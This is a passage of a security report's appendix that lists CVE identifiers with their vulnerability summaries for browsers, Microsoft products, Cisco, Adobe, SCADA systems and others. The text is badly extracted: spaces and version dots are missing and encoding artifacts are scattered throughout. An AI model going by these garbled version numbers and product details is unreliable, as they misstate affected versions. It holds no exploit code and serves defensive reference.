CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
